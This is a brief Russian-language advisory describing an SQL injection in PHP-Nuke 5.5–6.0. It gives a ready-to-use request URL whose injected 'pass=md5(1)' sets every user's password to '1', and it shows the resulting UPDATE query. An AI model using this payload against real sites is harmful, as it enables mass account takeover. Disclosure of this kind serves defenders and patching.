PHP-Nuke — система управления контентом, написанная на PHP.
PHP-Nuke уязвим к нападению SQL injection, которая позволяет атакующему изменять существующий SQL запрос и модифицировать информацию в базе данных. Следующий пример изменит все пароли пользователей PHP-Nuke на ‘1’. Эксплуатация требует, чтобы атакующий вошел в систему и определил свой UID, просматривая код страницы. Если UID атакующего равен 2, то он может начать нападение, запрашивая следующий URL: 

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage= 
no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/* 

Введенный запрос построен следующим образом: 

 PDATE nuke_users 
 SET name = », 
 email = », 
 femail = », 
 url = ‘http://’, 
 pass = ‘xxxxx’, 
+—[ bio = ‘\’, 
|    user_avatar = », 
|    user_icq = », 
|    user_occ = », 
|    user_from = », 
|    user_intrest = », 
|    user_sig = », 
|    user_aim = », 
|    user_yim = », 
|    user_msnm = », 
+—[ newsletter = ‘, 
 bio=0,pass=md5(1)/*’ WHERE uid=’2′ 

Уязвимость обнаружена в PHP-Nuke 5.5-6.0.



Оставить мнение